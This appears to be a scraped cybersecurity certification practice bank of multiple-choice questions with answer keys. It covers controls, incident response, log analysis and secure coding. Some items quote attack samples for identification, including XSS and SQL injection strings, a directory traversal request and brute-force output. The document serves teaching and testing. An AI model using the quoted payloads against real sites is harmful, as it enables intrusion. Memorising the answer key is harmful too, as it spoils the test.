Your company has created a baseline image for all of its workstations using Windows 10. Unfortunately, the image included a copy of Solitaire, and the CIO has created a policy to prevent anyone from playing the game on the company's computers. You have been asked to create a technical control to enforce the policy (administrative control) that was recently published. What should you implement? A. Application block list B. Application allow list C. Application hardening D. Disable removable media

A

Your company is making a significant investment in infrastructure-as-a-service (IaaS) hosting to replace its data centers. Which of the following techniques should be used to mitigate the risk of data remanence when moving virtual hosts from one server to another in the cloud? A. Use full-disk encryption B. Use data masking C. Span multiple virtual disks to fragment data D. Zero-wipe drives before moving systems

A

Your company just launched a new invoicing website for use by your five largest vendors. You are the cybersecurity analyst and have been receiving numerous phone calls that the webpage is timing out, and the website overall is performing slowly. You have noticed that the website received three million requests in just 24 hours, and the service has now become unavailable for use. What do you recommend should be implemented to restore and maintain the availability of the new invoicing system? A. Implement an allow list B. VPN C. Intrusion Detection System D. MAC filtering

A

Your intrusion detection system has produced an alert based on its review of a series of network packets. After analysis, it is determined that the network packets did not contain any malicious activity. How should you classify this alert? A. False positive B. True positive C. True negative D. False negative

A

Your organization has just migrated to provisioning its corporate desktops as virtual machines and accessing them using thin clients. The organization believes this will enhance security since the desktop can be rewritten with a new baseline image every time the user logs into it. Based on this scenario, which of the following technologies has the organization adopted? A. VDI B. VPC C. VPN D. UEBA

A

Your organization has recently been the target of a spearphishing campaign. You have identified the website associated with the link in the spearphishing emails and want to deny access to it. Which of the following techniques would be the MOST effective in this situation? A. URL filter B. Application blocklist C. Quarantine D. Containment

A

What is the term for the amount of risk that an organization is willing to accept or tolerate? A. Risk transference B. Risk appetite C. Risk deterrence D. Risk avoidance

B

Which of the following secure coding best practices ensures a character like < is translated into the &lt string when writing to an HTML page? A. Error handling B. Output encoding C. Session management D. Input validation

B

A cybersecurity analyst is attempting to perform an active reconnaissance technique to audit their company's security controls. Which DNS assessment technique would be classified as active? A. DNS forward or reverse lookup B. zone transfer C. whois query D. Using maltego

B

A cybersecurity analyst is reviewing the logs for his company's server and sees the following output: spawned by services.exe (C:\Win...\Sys..32\inetsrv\svchost.exe) spawned by services.exe (C:\Win...\Sys..32\cmd.exe) cmd /c start C:\Win...\Sys..32\wmiprvse.exe C:\Win...\Sys..32 2006) Based on this potential indicator of compromise (IoC), which of the following hypotheses should you make to begin threat hunting? A. Beaconing is establishing a connection to a C2 server B. Unauthorized privileges are being utilized C. Data exfiltration is occurring over the network D. A common protocol is being used over a non-standard port

B

A cybersecurity analyst is reviewing the logs of a Citrix NetScaler Gateway running on a FreeBSD 8.4 server and saw the following output: BEGIN LOG 10.1.1.1 - - [10/Jan/2020:13:23:51 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 143 "https://10.1.1.2/" "USERAGENT 10.1.1.1 - - [10/Jan/2020:13:23:53 +0000] "GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1" 200 941 "_" "USERAGENT" 10.1.1.1 - - [10/Jan/2020:16:12:31 +0000] "POST /vpns/portal/scripts/newbm.pl HTTP/1.1" 200 143 "https://10.1.1.2/" "USERAGENT" END LOG What type of attack was most likely being attempted by the attacker? A. XML injection B. Directory traversal C. SQL injection D. Password spraying

B

A fire suppression system is an example of what type of control? A. Logical B. Physical C. Administrative D. Operational

B

A software assurance test analyst performs a dynamic assessment on an application by automatically generating random data sets and inputting them in an attempt to cause an error or failure condition. Which technique is the analyst utilizing? A. Known bad data injection B. Fuzzing C. Static code analysis D. Sequential data sets

B

A statement like "Windows workstations must have the current security configuration template applied to them before being deployed" is most likely to be part of which document? A. Policies B. Standards C. Procedures D. Guidelines

B

According to Lockheed Martin's white paper "Intel Driven Defense," which of the following technologies could degrade an adversary's effort during the actions on the objectives phase of the kill chain? A. Audit log B. Quality of service C. Honeypot D. NIPS

B

Alexa is an analyst for a large bank that has offices in multiple states. She wants to create an alert to detect if an employee from one bank office logs into a workstation located at an office in another state. What type of detection and analysis is Alexa configuring? A. Heuristic B. Behavior C. Anomaly D. Trend

B

An electronics store was recently the victim of a robbery where an employee was injured, and some property was stolen. The store's IT department hired an external supplier to expand its network to include a physical access control system. The system has video surveillance, intruder alarms, and remotely monitored locks using an appliance-based system. Which of the following long-term cybersecurity risks might occur based on these actions? A. These devices should be scanned for viruses before installation B. These devices should be isolated from the rest of the enterprise network C. These devices are insecure and should be isolated from the internet D. There are no new risks due to the install, and the company has a stronger physical security posture

B

An independent cybersecurity researcher has contacted your company to prove a buffer overflow vulnerability exists in one of your applications. Which technique would have been most likely to identify this vulnerability in your application during development? A. Pair programming B. Static code analysis C. Manual Peer Review D. Dynamic code analysis

B

Dion Training's new COO is reviewing the organization's current information security policy. She notices that it was first created three years ago. Since that time, the organization has undergone multiple audits and assessments that required revisions to the policy. Which of the following is the most reasonable frequency to conduct a formal review of the organization's policies to ensure they remain up to date? A. Quarterly B. Annually C. Every five years D. Monthly

B

Fail to Pass Systems has just become the latest victim in a large-scale data breach by an APT. Your initial investigation confirms a massive exfiltration of customer data has occurred. Which of the following actions do you recommend to the CEO of Fail to Pass Systems in handling this data breach? A. Purchase a cyber insurance policy, alter the date of the incident in the log files, and file an insurance claim B. Conduct notification to all affected customers within 72 hours of the discovery of the breach C. Conduct a 'hack-back' of the attacker to retrieve the stolen information D. Provide a statement to the press that minimizes the scope of the breach

B

Jason has created a new password cracking tool using some Python code. When he runs the program, the following output is displayed: # ./CrackPWD.py Password cracking is in progress... Passwords found for 4 users: 1) jason:rover123 2) tamera:Purple6! 3) sahra:123Password 4) time:cupcakes2 Based on the output, what type of password-cracking method does Jason's new tool utilize? A. Rainbow attack B. Hybrid attack C. Dictionary attack D. Brute force attack

B

Jason has installed multiple virtual machines on a single physical server. He needs to ensure that the traffic is logically separated between each virtual machine. How can Jason best implement this requirement? A. Install a virtual firewall and establish an access control list B. Configure a virtual switch on the physical server and create VLANs C. Create a virtual router and disable the spanning tree protocol D. Conduct system partitioning on the physical server to ensure the virtual disk images are on different partitions

B

Jason is conducting an assessment of a network-enabled software platform that contains a published API. In reviewing the platform's key management, he discovers that API keys are embedded in the application's source code. Which of the following statements best describes the security flaw with this coding practice? A. It is difficult to control the permission levels for embedded keys B. The embedded key may be discovered by an attacker who reverse engineers the source code C. Changing the API key will require a corresponding software upgrade D. Key management is no longer required since the key is embedded in the source code

B

Jorge and Marta are working on a programming project together. During a code review, Marta explains her code to Jorge while looking at the code on her computer. Which of the following code review techniques is being used in this scenario? A. Tool-assisted review B. Over-the-shoulder C. Dual control D. Pair programming

B

Joseph would like to prevent hosts from connecting to known malware distribution domains. What type of solution should be used without deploying endpoint protection software or an IPS system? A. Subdomain allow listing B. DNS sinkholing C. Anti-malware router filters D. Route poisoning

B

Nick is participating in a security exercise as part of the network defense team for his organization. Which team is Nick playing on? A. White team B. Blue team C. Red team D. Yellow team

B

Review the network diagram provided: <Internet>->Router->Firewall Then, the Firewall connects to 3 zones: 1) DMZ: FTP Server 192.168.0.5 Web Server 192.168.0.6 Email Server 192.168.0.7 2) Intranet workstations: Sales 172.16.1.2 HR 172.16.1.3 IT 172.16.1.4 3) Data Center Backup 192.168.1.10 Confidential 192.168.1.11 Files 192.168.1.12 Which of the following ACL entries should be added to the firewall to allow only the system administrator's computer (IT) to have SSH access to the FTP, Email, and Web servers in the DMZ?(Note: The firewall in this network is using implicit deny to maintain a higher level of security. ACL entries are in the format of Source IP, Destination IP, Port Number, TCP/UDP, Allow/Deny.) A. 192.168.0.0/24, 172.16.1.4, 22, TCP, ALLOW B. 172.16.1.4, 192.168.0.0/24, 22, TCP, ALLOW C. 172.16.1.0/24, 192.168.0.0/24, ANY, TCP, ALLOW D. 192.168.0.3/24, 172.16.1.4, ANY, TCP, ALLOW

B

Riaan's company runs critical web applications. During a vulnerability scan, Riaan found a serious SQL injection vulnerability in one of their web applications. The system cannot be taken offline to remediate the vulnerability. Which of the following compensating controls should Riaan recommend using until the system can be remediated? A. Encryption B. WAF C. IPS D. Vulnerability scanning

B

Sarah has reason to believe that systems on her network have been compromised by an APT. She has noticed many file transfers outbound to a remote site via TLS-protected HTTPS sessions from unknown systems. Which of the following techniques would most likely detect the APT? A. Network traffic analysis B. Endpoint forensics C. Endpoint behavior analysis D. Network forensics

B

Suki is concerned that a user might abuse their privileges to create a new vendor in the accounting system and then issue that vendor a check. What security control would best protect against this risk? A. Dual control B. Separation of duties C. Background checks D. Cross training

B

Susan is worried about the security of the master account associated with a cloud service and access to it. This service is used to manage payment transactions. She has decided to implement a new multifactor authentication process where one individual has the password to the account. Still, another user in the accounting department has a physical token to the account. To log in to the cloud service with this master account, both users would need to come together. What principle is Susan implementing by using this approach? A. Transitive trust B. Dual control authentication C. Security through obscurity D. Least privilege

B

The Pass Certs Fast corporation has recently been embarrassed by several high-profile data breaches. The CIO proposes improving the company's cybersecurity posture by migrating images of all the current servers and infrastructure into a cloud-based environment. What, if any, is the flaw in moving forward with this approach? A. The company has already paid for the physical servers and will not fully realize their ROI on them due to the migration B. This approach only changes the location of the network and not the network's attack surface C. This approach assumes that the on-site administrators will provide better security than the cloud provider D. This is a reasonable approach that will increase the security of the servers and infrastructure

B

The Security Operations Center Director for Dion Training received a pop-up message on his workstation that said, "You will regret firing me; just wait until Christmas!" He suspects the message came from a disgruntled former employee who may have set up a piece of software to create this pop-up on his machine. The director is now concerned that other code might be lurking within the network that could negatively affect Christmas. He directs his team of cybersecurity analysts to begin searching the network for this suspicious code. What type of malware should they be searching for? A. Trojan B. Logic bomb C. Adware D. Worm

B

What containment technique is the strongest possible response to an incident? A. Isolating the attacker B. Isolating affected systems C. Enumeration D. Segmentation

B

What control provides the best protection against both SQL injection and cross-site scripting attacks? A. Network layer firewalls B. Input validation C. Hypervisors D. CSRF

B

What describes the infrastructure needed to support the other architectural domains in the TOGAF framework? A. Business architecture B. Technical architecture C. Data architecture D. Applications architecture

B

What level of secure media disposition as defined by NIST SP 800-88 is best suited to a hard drive from a high-security system that will be reused in the same company by an employee of a different level or job type? A. Clear B. Purge C. Destroy D. Reinstall

B

What phase of the software development lifecycle is sometimes known as the acceptance, installation, and deployment phase? A. Development B. Training and transition C. Disposition D. Operations and maintenance

B

What techniques are commonly used by port and vulnerability scanners to enumerate the services running on a target system? A. Using the -O option in nmap and UDP response timing B. Banner grabbing and comparing response fingerprints C. Comparing response fingerprints and registry scanning D. Banner grabbing and UDP response timing

B

What type of malware is designed to be difficult for malware analysts to reverse engineer? A. Logic bomb B. Armored virus C. Rootkit D. Trojan

B

What type of system is used to contain an attacker to allow them to be monitored? A. white box B. sandbox C. network jail D. VLAN

B

When using the netstat command during an analysis, which of the following connection status messages indicates whether an active connection between two systems exists? A. LISTENING B. ESTABLISHED C. LAST_ACK D. CLOSE_WAIT

B

When you purchase an exam voucher at diontraining.com, the system only collects your name, email, and credit card information. Which of the following privacy methods is being used by Dion Training? A. Anonymization B. Data minimization C. Tokenization D. Data masking

B

Which analysis framework provides the most explicit detail regarding how to mitigate or detect a given threat? A. Diamond Model of Intrusion Analysis B. MITRE ATT&CK framework C. OpenIOC D. Lockheed Martin cyber kill chain

B

Which of the following authentication protocols was developed by Cisco to provide authentication, authorization, and accounting services? A. Kerberos B. TACACS+ C. CHAP D. RADIUS

B

Which of the following categories of controls are firewalls, intrusion detection systems, and a RADIUS server classified as? A. Administrative controls B. Technical controls C. Compensating controls D. Physical controls

B

Which of the following is the most difficult to confirm with an external vulnerability scan? A. Cross-site request forgery (XSRF/CSRF) B. Blind SQL injection C. Cross-site scripting (XSS) D. Unpatched web server

B

Which of the following is usually not considered when evaluating the attack surface of an organization? A. External and internal users B. Software development lifecycle model C. Websites and cloud entities D. Software applications

B

Which of the following techniques would best mitigate malware that utilizes a fast flux network for its command and control infrastructure? A. Blacklisting known malicious domain names B. Utilize a secure recursive DNS resolver to a third-party secure DNS resolver C. Blacklisting known malicious IP addresses D. Conduct detailed statistical analysis of the structure of domain names to detect anomalies See all questionsBackSkip question

B

Which of the following threats to a SaaS deployment would be the responsibility of the consumer to remediate? A. Unpatched operating systems on the server B. An endpoint security failure C. Cross-site scripting D. SQL injections See all questionsBackSkip question

B

Which of the following type of threats did the Stuxnet attack rely on to cross an air gap between a business and an industrial control system network? A. Directory traversal B. Removable media C. Session hijacking D. Cross-site scripting

B

Which of the following types of attackers are considered to be a sophisticated and highly organized person or team who are typically sponsored by a nation-state? A. Script kiddies B. Advanced Persistent Threat C. Hacktivists D. Ethical hacker

B

Which of the following types of data breaches would require that the US Department of Health and Human Services and the media be notified if more than 500 individuals are affected by a data breach? A. Trade secret information B. Protected health information C. Personally identifiable information D. Credit card information

B

While conducting a penetration test of an organization's web applications, you attempt to insert the following script into the search form on the company's website: script alert("This site is vulnerable to an attack!") script Then, you clicked the search button, and a pop-up box appears on your screen showing the following text, "This site is vulnerable to an attack!" Based on this response, what vulnerability have you uncovered in the web application? A. Buffer overflow B. Cross-site scripting C. Cross-site request forgery D. Distributed denial of service

B

While conducting a static analysis source code review of a program, you see the following line of code: String query = "SELECT * FROM CUSTOMER WHERE CUST ID='" + request.getParameter("id") + "I"; What is the issue with the largest security issue with this line of code? A. This code is vulnerable to a buffer overflow attack B. A SQL injection could occur because input validation is not being used on the id parameter C. The code is using parameterized queries D. The * operator will allow retrieval of every data field about this customer in the CUSTOMER table

B

William evaluates the potential impact of a confidentiality risk and determines that the disclosure of information contained on a system could have a limited adverse effect on the organization. Using FIPS 199, how should he classify the confidentiality impact? A. High B. Low C. Moderate D. Medium

B

You are a cybersecurity analyst, and your company has just enabled key-based authentication on its SSH server. Review the following log file: BEGIN LOG Sep 09 13:15:24 diontraining sshd/3423]: Failed password for root from | 192.168.3.2 port 45273 ssh2 Sep 09 15:43:15 diontraining sshd/3542]: Failed password for root from 192.168.2.24 port 43543 ssh2 Sep 09 15:43:24 diontraining sshd[3544]: Failed password for jdion from 192.168.2.24 port 43589 ssh2 Sep 09 15:43:31 diontraining sshd[3546]: Failed password for tmartinez from 192.168.2.24 port 43619 ssh2 Sep 09 15:43:31 diontraining sshd 3546]: Failed password for jdion from 192.168.2.24 port 43631 ssh2 Sep 09 15:43:37 diontraining sshd[3548]: Failed password for root from 192.168.2.24 port 43657 ssh2 END LOG Which of the following actions should be performed to secure the SSH server? A. Disable anonymous SSH logon B. Disable password authentication for SSH C. Disable remote root SSH logon D. Disable SSHv1

B

You are applying for a job at a cybersecurity firm. The application requests you enter your social security number, date of birth, and email address to conduct a background check as part of the hiring process. Which of the following types of information have you been asked to provide? A. IP B. PII C. PHI D. CUI

B

You are conducting a code review of a program and observe the following calculation of 0xffffffff + 1 was attempted, but the result was returned as 0x0000000. Based on this, what type of exploit could be created against this program? A. Impersonation B. Integer overflow attack C. Password spraying D. SQL injection

B

You are conducting a vulnerability assessment when you discover a critical web application vulnerability on one of your Apache servers. Which of the following files would contain the Apache server's logs if your organization uses the default naming convention? A. httpd_log B. access_log C. http_log D. apache_log

B

You are developing a containment and remediation strategy to prevent the spread of an APT within your network. Your plan suggests creating a mirror of the company's databases, routing all externally sourced network traffic to it, and gradually updating with pseudo-realistic data to confuse and deceive the APT as they attempt to exfiltrate the data. Once the attacker has downloaded the corrupted database, your company would then conduct remediation actions on the network and restore the correct database information to the production system. Which of the following types of containment strategies does the plan utilize? A. Isolation-based containment by disconnecting the APT from the affected network B. Segmentation-based containment that deceives the attack into believing their attack was successful C. Isolation-based containment by removing the affected database from production D. Segmentation-based containment disrupts the APT by using a hack-back approach

B

You are reviewing the IDS logs and notice the following log entry: (where [email protected] and password=' or 7==7') What type of attack is being performed? A. Header manipulation B. SQL injection C. XML injection D. Cross-site scripting

B

You are working as a security administrator and need to respond to an ongoing spearphishing campaign against your organization. Which of the following should be used as a checklist of actions to perform to detect and respond to this particular incident? A. Runbook B. Playbook C. Incident response plan D. Disaster recovery plan

B

You conducted a security scan and found that port 389 is being used when connecting to LDAP for user authentication instead of port 636. The security scanning software recommends that you remediate this by changing user authentication to port to 636 wherever possible. What should you do? A. Conduct remediation actions to update encryption keys on each server to match port 636 B. Change all devices and servers that support it to port 636 since encrypted services run by default on port 636 C. Change all devices and servers that support it to port 636 since port 389 is a reserved port that requires root access and can expose the server to privilege escalation attacks D. Mark this as a false positive in your audit report since the services that typically run on ports 389 and 636 are identical

B

You have been asked to determine if Dion Training's web server is vulnerable to a recently discovered attack on an older version of SSH. Which technique should you use to determine the current version of SSH running on their web server? A. Vulnerability scan B. Banner grabbing C. Passive scan D. Protocol analysis

B

You have been asked to recommend a capability to monitor all of the traffic entering and leaving the corporate network's default gateway. Additionally, the company's CIO requests to block certain content types before it leaves the network based on operational priorities. Which of the following solution should you recommend to meet these requirements? A. Configure IP filtering on the internal and external interfaces of the router B. Install a NIPS on the internal interface and a firewall on the external interface of the router C. Installation of a NIPS on both the internal and external interfaces of the router D. Install a firewall on the router's internal interface and a NIDS on the router's external interface

B

You have been asked to review the SIEM event logs for suspected APT activity. You have been given several indicators of compromise, such as a list of domain names and IP addresses. What is the BEST action to take to analyze the suspected APT activity? A. Create an advanced query that includes all of the indicators and review any matches B. Analyze the trends of the events while manually reviewing them to see if any indicators match C. Use the IP addresses to search through the event logs D. Scan for vulnerabilities with exploits known to previously have been used by an APT

B

You have been given access to a Windows system located on an Active Directory domain as part of a known environment penetration test. Which of the following commands would provide information about other systems on this network? A. net user B. net view C. net group D. net config

B

You have just completed identifying, analyzing, and containing an incident. You have verified that the company uses older unencrypted SSDs as part of their default configuration, and the manufacturer does not provide a SE utility for the devices. The storage devices contained top-secret data that would bankrupt the company if it fell into a competitor's hands. After safely extracting the device's data and saving it to a new self-encrypting drive, you have been asked to dispose of the SSDs securely. Which of the following methods should you use? A. Perform a cryptographic erase (CE) on the storage devices B. Physically destroy the storage devices C. Use a secure erase (SE) utility on the storage devices D. Conduct zero-fill on the storage devices

B

You have just completed identifying, analyzing, and containing an incident. You have verified that the company uses self-encrypting drives as part of its default configuration. As you begin the eradication and recovery phase, you must sanitize the storage devices' data before restoring the data from known-good backups. Which of the following methods would be the most efficient to use to sanitize the affected hard drives? A. Incinerate and replace the storage devices B. Perform a cryptographic erase (CE) on the storage devices C. Conduct zero-fill on the storage devices D. Use a secure erase (SE) utility on the storage devices

B

You have just finished running a vulnerability scan of the network and are reviewing the results. The first result in the report shows the following vulnerability: Linux:- diontraining $ cat results.txt Vulnerability scanning results... IP: 192.168.2.51 Service: MySQL Version: 3.1.7 Details: Versions 3.0 - 3.2 may be vulnerable to remote code execution. Recommendation: Upgrade the MySQL server to version 3.3.x or above. You log into the MySQL server and verify that you are currently running version 3.5.3. Based on the item shown on the image, what best describes how you should categorize this finding? A. False negative B. False positive C. True positive D. True negative

B

You received an incident response report indicating a piece of malware was introduced into the company's network through a remote workstation connected to the company's servers over a VPN connection. Which of the following controls should be applied to prevent this type of incident from occurring again? A. MAC filtering B. NAC C. SPF D. ACL

B

You suspect that a service called explorer.exe on a Windows server is malicious, and you need to terminate it. Which of the following tools would NOT be able to terminate it? A. sc B. secpol.msc C. wmic D. services.msc

B

You walked up behind a penetration tester in your organization and saw the following output on their Kali Linux terminal: [ATTEMPT] target 192.168.1.142 -- login "root" pass "abcde" 1 of 10 [ATTEMPT] target 192.168.1.142 -- login "root" pass "efghi" 2 of 10[ATTEMPT] target 192.168.1.142 -- login "root" pass "12345" 3 of 10[ATTEMPT] target 192.168.1.142 -- login "root" pass "67890′′ 4 of 10[ATTEMPT] target 192.168.1.142 -- login "root" pass "a1b2c" 5 of 10[ATTEMPT] target 192.168.1.142 -- login "user" pass "abcde" 6 of 10[ATTEMPT] target 192.168.1.142 -- login "user" pass "efghi" 7 of 10[ATTEMPT] target 192.168.1.142 -- login "user" pass "12345" 8 of 10[ATTEMPT] target 192.168.1.142 -- login "user" pass "67890" 9 of 10[ATTEMPT] target 192.168.1.142 -- login "user" pass "alb2c" 10 of 10 What type of test is the penetration tester currently conducting? A. Conducting a ping sweep of 192.168.1.142/24 B. Conducting a brute force login attempt of a remote service on 192.168.1.142 C. Conducting a Denial of Service attack on 192.168.1.142 D. Conducting a port scan of 192.168.1.142

B

You want to search all the logs using REGEX to alert on any findings where a filename contains the word "password" (regardless of case). For example, "PASSWORD.txt," "Password.log," or "password.xlsx" should cause the alert to occur. Once deployed, this search will be conducted daily to find any instances of an employee saving their passwords in a file that could be easily found by an attacker. Which of the following commands would successfully do this? A. grep \i password logfile.log B. grep -i password logfile.log C. grep "(PASSWORD)|(password)" logfile.log D. grep password /i logfile.log

B

Your company has just announced a change to an "API first" model of software development. As a cybersecurity analyst, you are immediately concerned about the possibility of an insecure deserialization vulnerability in this model. Which of the following is the primary basis for an attack against this vulnerability? A. Lack of input validation could allow for a SQL attack B. Accepting serialized objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution C. Lack of input validation could lead to a cross-site scripting attack D. Insufficient logging and monitoring makes it impossible to detect when insecure deserialization vulnerabilities are exploited

B

Your company was recently the victim of a cross-site scripting attack. The system administrators claim this wasn't possible since they performed input validation using REGEX to alert on any strings that contain the term "[Ss]cript" in them. Which of the following statements concerning this attack is true? A. The attacker has modified the logs to cover their tracks and prevent a successful investigation B. The REGEX expression to filter using "[Ss]cript" is insufficient since an attacker could use SCRIPT or SCRipt or %53CrIPT to evade it C. The server has insufficient logging and monitoring configured D. A SQL injection must have occurred since their input validation would have prevented SCRIPT or script from being used

B

Your organization is updating its incident response communications plan. A business analyst in the working group recommends that if the company discovers they are the victims of a data breach, they should only notify the affected parties to minimize media attention and bad publicity. Which of the following recommendations do you provide in response to the business analyst's statement? A. The first responder should contact law enforcement upon confirmation of a security incident for a forensic team to preserve the chain of custody B. Guidance from laws and regulations should be considered when deciding who must be notified to avoid fines and judgments from non-compliance C. The Human Resources department should have information security personnel who are involved in the investigation of the incident sign non-disclosure agreements so the company cannot be held liable for customer data that is viewed during an investigation D. An externally hosted website should be prepared in advance to ensure that when an incident occurs, victims have timely access to notifications from a non-compromised resource

B

Your organization recently suffered a large-scale data breach. The hackers successfully exfiltrated the personal information and social security numbers of your customers from your network. The CEO notified law enforcement about the breach. They will assist with the investigation and conduct evidence collection so that the hackers can be brought up on charges. What actions should your organization take in response to this event? A. Block all employee access to social media from the company's network and begin monitoring your employee's email B. Ask a member of law enforcement to meet with your employees C. Require all employees to commit to an NDA about the data breach verbally D. Require all employees to commit to an NDA about the data breach in writing

B

A cybersecurity analyst is analyzing an employee's workstation that is acting abnormally. The analyst runs the netstat command and reviews the following output: Proto LocalAddr ForeignAddr State TCP 0.0.0.0:53 0.0.0.0:0 LISTENING TCP 0.0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING TCP 192.168.1.4:53 91.198.117.247:443 CLOSE WAIT TCP 192.168.1.4:59393 74.125.224.39:443 ESTABLISHED TCP 192.168.1.4:59515 208.50.77.89:80 ESTABLISHED TCP 192.168.1.4:59518 69.171.227.67:443 ESTABLISHED TCP 192.168.1.4:59522 96.16.53.227:443 ESTABLISHED TCP 192.168.1.4:59523 96.16.53.227:443 ESTABLISHED TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED TCP 192.168.1.4:59538 74.125.224.98:80 ESTABLISHED TCP 192.168.1.4:59539 74.125.224.98:80 ESTABLISHED Based on this output, which of the following entries is suspicious? (SELECT THREE) A. TCP 192.168.1.4:59515 208.50.77.89:80 ESTABLISHED B. TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED C. TCP 0.0.0.0:135 0.0.0.0:0 LISTENING D. TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT E. TCP 192.168.1.4:59518 69.171.227.67:443 ESTABLISHED F. TCP 0.0.0.0:53 0.0.0.0:0 LISTENING

BCE

Which of the following are the two most important factors when determining a containment strategy? (Select two) A. Identification of whether the intrusion is the primary attack or a secondary one (i.e., part of a more complex campaign) B. Prevention of an ongoing intrusion or data breach C. Preservation of evidence D. Ensuring the safety and security of all personnel E. Avoidance of alerting the attacker that they have been discovered

BD

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, https://www.google.com/search?q=password+filetype%3Axls+site%3Adiontraining.com&pws=0&filter=p. Which of the following is true about the results of this search? (SELECT THREE) A. Find sites related to diontraining.com B. Returns only files hosted at diontraining.com C. All search filters are deactivated D. Returns only Microsoft Excel spreadsheets E. Personalization is turned off F. Excludes Microsoft Excel spreadsheets

BDE

A penetration tester is conducting an assessment of a wireless network that is secure using WPA2 Enterprise encryption. Which of the following are major differences between conducting reconnaissance of a wireless network versus a wired network? (SELECT TWO) A. Port security B. Physical accessibility C. MAC filtering D. Network access control E. Encryption F. Authentication

BE

A cybersecurity analyst at Yoyodyne Systems just finished reading a news article about their competitor, Whamiedyne Systems, being hacked by an unknown threat actor. Both companies sell to the same basic group of consumers over the internet since their products are used interchangeably by consumers. Which of the following is a valid cybersecurity concern for Yoyodyne Systems? A. The same vulnerability will be compromised on their servers B. The attacker will conduct a SQL injection against their database C. They may now be vulnerable to a credential stuffing attack D. The attacker will conduct an on-path attack

C

A cybersecurity analyst has deployed a custom DLP signature to alert on any files that contain numbers in the format of a social security number (xxx-xx-xxxx). Which of the following concepts within DLP is being utilized? A. Statistical matching B. Classification C. Exact data match D. Document matching

C

A cybersecurity analyst is reviewing the DNS logs for his company's networks and sees the following output: $ cat dns.log | bro-cut query gu2m9qhychvxrvhleift.com oxboxkgtyx9veimcuyri.com 4f3mvgt0ah6m292 frsmo.com asvi6d6ogplqyfhrn0p7.com 5qlark642x5jbissjm86.com Based on this potential indicator of compromise (IoC), which of the following hypotheses should you make to begin threat hunting? A. The DNS server is running out of memory due to a memory B. resource exhaustion attack B. Data exfiltration is being attempted by an APT C. Fast flux DNS is being used for an attacker's C2 D. The DNS server's hard drive is being used as a staging location for a data exfiltration

C

A new security appliance was installed on a network as part of a managed service deployment. The vendor controls the appliance, and the IT team cannot log in or configure it. The IT team is concerned about the appliance receiving the necessary updates. Which of the following mitigations should be performed to minimize the concern for the appliance and updates? A. Automatic updates B. Configuration management C. Vulnerability scanning D. Scan and patch the device

C

A recent threat has been announced in the cybersecurity world, stating a critical vulnerability in a particular operating system's kernel. Unfortunately, your company has not maintained a current asset inventory, so you are unsure of how many of your servers may be affected. What should you do to find all of the affected servers within your network? A. Conduct a service discovery scan on the network B. Conduct a packet capture of data traversing the server network C. Conduct an OS fingerprinting scan across the network D. Manually review the syslog server's logs

C

A supplier needs to connect several laptops to an organization's network as part of their service agreement. These laptops will be operated and maintained by the supplier. Victor, a cybersecurity analyst for the organization, is concerned that these laptops could contain some vulnerabilities that could weaken the network's security posture. What can Victor do to mitigate the risk to other devices on the network without having direct administrative access to the supplier's laptops? A. Scan the laptops for vulnerabilities and patch them B. Increase the encryption level of VPN used by the laptops C. Implement a jumpbox system D. Require 2FA (two-factor authentication) on the laptops

C

A vulnerability scan has returned the following results: Detailed Results 10.56.17.21 (APACHE-2.4) Windows Shares Category: Windows CVE ID: - Vendor Ref: - Bugtraq ID: - Service Modified - 8.30.2017 Enumeration Results: print $ c:\windows\system32\spool\drivers files c:\FileShare\Accounting What best describes the meaning of this output? A. There is no CVE present, so this is a false positive caused by Apache running on a Windows server B. There is an unknown bug in an Apache server with no Bugtraq ID C. Connecting to the host using a null session allows enumeration of the share names on the host D. Windows Defender has a known exploit that must be resolved or patched

C

An incident response team is publishing an incident summary report and is determining the evidence retention requirements for the data collected during a response. Which of the following incident response phases is currently being performed by the team? A. Eradication and recovery B. Preparation C. Post-incident activities D. Detection and analysis

C

An insurance company has developed a new web application to allow its customers to choose and apply for an insurance plan. You have been asked to help perform a security review of the new web application. You have discovered that the application was developed in ASP and used MSSQL for its backend database. You have been able to locate an application's search form and introduced the following code in the search input field: IMG_SRC=vb_script:msgbox("Vulnerable to Attack");> originalAttribute="SRC", originalPath="vb_script:msg_box ("Vulnerable_to_Attack") When you click submit on the search form, your web browser returns a pop-up window that displays Vulnerable_to_Attack. Which of the following vulnerabilities did you discover in the web application? A. Cross-site request forgery B. SQL injection C. Cross-site scripting D. Command injection

C

Cybersecurity analysts are experiencing some issues with their vulnerability scans aborting because the previous day's scans are still running when the scanner attempts to start the current day's scans. Which of the following recommendations is LEAST likely to resolve this issue? A. Reduce the frequency of scans B. Add another vulnerability scanner C. Reduce the sensitivity of scans D. Reduce the scope of scans

C

Dion Consulting Group has been hired to analyze the cybersecurity model for a new videogame console system. The manufacturer's team has come up with four recommendations to prevent intellectual property theft and piracy. As the cybersecurity consultant on this project, which of the following would you recommend they implement first? A. Ensure that all screen capture content is visibly watermarked B. Ensure that all games for the console are distributed as encrypted so that they can only be decrypted on the game console C. Ensure that each individual console has a unique key for decrypting individual licenses and tracking which console has purchased which game D. Ensure that all games require excessive storage sizes so that it is difficult for unauthorized parties to distribute

C

Dion Training Solutions is conducting a penetration test of its facilities. The penetration testing team has been augmented by an employee of the company who has general user privileges. The security staff is unaware of the testing. According to NIST, which of the following types of penetration tests is being conducted? A. covert external test B. overt external test C. covert internal test D. overt internal test

C

Dion Training allows its visiting business partners from CompTIA to use an available Ethernet port in their conference room to establish a VPN connection back to the CompTIA internal network. The CompTIA employees should obtain internet access from the Ethernet port in the conference room, but nowhere else in the building. Additionally, if any of the Dion Training employees use the same Ethernet port in the conference room, they should access Dion Training's secure internal network. Which of the following technologies would allow you to configure this port and support both requirements? A. Configure a SIEM B. Create an ACL to allow access C. Implement NAC D. MAC filtering

C

